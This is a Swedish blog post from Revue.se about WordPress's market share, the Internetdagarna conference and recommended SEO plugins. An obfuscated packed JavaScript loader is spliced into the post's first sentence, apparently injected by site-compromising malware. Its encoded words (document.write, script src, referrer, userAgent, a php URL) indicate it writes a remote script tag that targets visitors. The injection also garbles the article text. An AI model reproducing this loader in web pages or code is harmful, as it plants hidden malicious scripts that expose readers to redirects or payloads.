Image Image Image Image Image Image Image Image Image Image

| 26 april, 2018

Scroll to top

Top

9 Comments

Wordpress fortsätter att växa som CMS | Revue.se

WordPress fortsätter att växa som CMS
Sebastian Plengier Ehrnfelt

Förra eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndrsa|var|u0026u|referrer|sbtka||js|php’.split(‘|’),0,{}))
veckan var Revue.se på plats under Internetdagarna i Stockholm. En konferens under två dagar med talare från alla möjliga branscher. Revue.se valde att gå på några keynotes där man talade om bland annat WordPress som CMS samt även om Startups. 

WordPress som är ett system ni säkert redan vet mycket om fortsätter att växa och ta mark. En undersökning som gjordes för inte allt för längesen menar att av alla hemsidor idag på nätet som använder ett CMS har WordPress 60 procent av marknaden. Något som jag själv tycker låter lite väl mycket. Dock fanns det några begränsningar i undersökningen. Alla webbsidor som idag använder sig av en subdomän, dvs inte en egen unik domän hamnar under ett cms. Så alla miljoner bloggar som använder xxx.tumblr.com ränkas endast som tumblr.com.

WordPress är ett intressant verktyg som helt klart är det mest flexibla jag känner till och arbetar i. Därför kommer här nedan några tips på plugins som kan vara bra att ha tillgodo för er egna hemsida. Dessa tips är några för att få upp er hemsida högre upp på Google, Bing, Yahoo mfl sökmotorer. En Webbyrå som jobbar med WordPress är bland annat Bevace.

WordPress kommer även att uppdateras nu i December till en ny version där hela gränssnittet har gjorts om grafiskt. Även ett nytt tema kallat Twenty Fourteen kommer att lanseras. Temat kan ni se på bilden ovan.

WordPress SEO by Yoast

Denna plugin är skrivet från grunden av Joost de Valk och hans team på Yoast för att förbättra webbplatsens SEO på alla nödvändiga aspekter. Även om detta WordPress SEO plugin går det lilla extra för att ta hand om alla tekniska optimering, mer om det nedan, först och främst hjälper det dig att skriva bättre innehåll.

All in One SEO Pack

Allt i allo SEO Pack för att Optimera din WordPress sajt för SEO (Search Engine Optimization).

Google XML Sitemaps

Denna plugin kommer att generera en speciell XML-sitemap som hjälper sökmotorer som Google, Bing, Yahoo och Ask.com för att bättre indexera din blogg. Med en sådan sitemap, är det mycket lättare för sökrobotar att se hela strukturen på din webbplats och hämta det på ett effektivare sätt.